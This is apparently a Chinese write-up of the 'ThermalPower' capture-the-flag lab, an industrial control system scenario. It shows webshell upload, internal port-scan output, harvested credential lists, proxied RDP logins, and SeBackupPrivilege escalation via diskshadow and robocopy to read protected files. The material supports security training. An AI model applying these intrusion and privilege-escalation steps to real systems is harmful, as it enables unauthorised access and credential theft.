春秋云镜-ThermalPower

flag01

fscanPlus扫一下,发现heapdump泄露
传统泄露ShiroKey,我们用工具即可


flag{81700400-eecc-4895-aa1e-042d7309a630}

flag02

拿到shell之后冰蝎上马
然后传stotoway打内网穿透
切换到stotoway操作
在fscan扫一下内网段
fscanPlus -h 172.22.17.213/24

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.6:80 open
172.22.17.6:21 open
172.22.17.213:22 open
172.22.17.213:8181 open
[*] alive ports len is: 8
start vulscan
[*] NetInfo
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
Read failed: EOF
[*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=7D4C35CD42694F9F629123B884E7757C
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=7D4C35CD42694F9F629123B884E7757C code:200 len:2936 title:火创能源监控画面管理平台
[+] ftp 172.22.17.6:21:anonymous
[->]Modbus
[->]PLC
[->]web.config
[->]WinCC
[->]内部软件
[->]火创能源内部资料
[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER Windows Version 10.0 Build 20348
[*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2

存在资产

172.22.17.6

这里泄露了一些敏感信息
这里拿到密码

1
2
3
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3

看了些其他信息比如

我们又拿到了内部工程师名单,成功拿到一系列普通账户

1
2
3
4
5
6
7
8
9
10
chenhua/chenhua@0813
zhaoli/zhaoli@0821
wangning/wangning@0837
zhangling/zhangling@0871
zhangying/zhangying@0888
wangzhiqiang/wangzhiqiang@0901
chentao/chentao@0922
zhouyong/zhouyong@0939
lilong/lilong@1046
liyumei/liyumei@1048

这里简单登录稍微验证一下
中间有一次代理断了,连上就好了
上述命令报错,尝试RDB登录

1
proxychains xfreerdp /v:172.22.17.6 /u:chenhua /p:'chenhua@0813'

现在如何进行提权呢?
但是进去之后无法读取flag02.txt
使用一种提权打法
这里利用脚本,但是实际遭遇了一个问题,启动后的特权和WP不太一致
这里注意管理员登录powershell
一下操作和其他师傅一样

1
2
3
4
5
6
7
8
9
10
11
使用脚本https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeBackupPrivilege.ps1
Import-Module .\EnableSeBackupPrivilege.ps1

创建以下文件内容script.txt
set context persistent nowriters
add volume c: alias mydrive
create
expose %mydrive% z:
随后在有权限的位置(无权限自己在C盘下创建一个目录)运行diskshadow /s script.txt

然后就可以列副盘z的目录


到了读取备份文件的时候,无法读取
稍微改了一下

1
robocopy z:\Users\Administrator\flag . /B /COPY:DAT /R:1 /W:1

成功将flag02.txt复制过来读取即可

flag{de946b53-3ba4-4fd0-b80f-aafc911ca447}
如上该提权方式的学习可以去https://www.cnblogs.com/kqdssheng/p/18741609
而相对总览可以看这一篇https://www.freebuf.com/articles/web/281863.html

flag03

还记得我们之前拿到的admin账户吗,直接rdp登录即可
但是注意选择哪一台主机
注意提示WIN-SCADA: 172.22.26.xx
扫一下

172.22.26.11
proxychains xfreerdp /v:172.22.17.6 /u:Administrator /p:'IYnT3GyCiy3' /clipboard
直接进入,打开锅炉,拿到flag3

flag{bcd080d5-2cf1-4095-ac15-fa4bep9ca1c0}

flag04

这里延续flag03登录该账户,这时候我们需要win+D退出当前情景
发现桌面若干文件
后续就是逆向桌面的勒索软件,发现需要AES_KEY才可以解密我们的sql文件读取flag
通过给的附件里的两个key计算关键AES_KEY
最后解出即可解出flag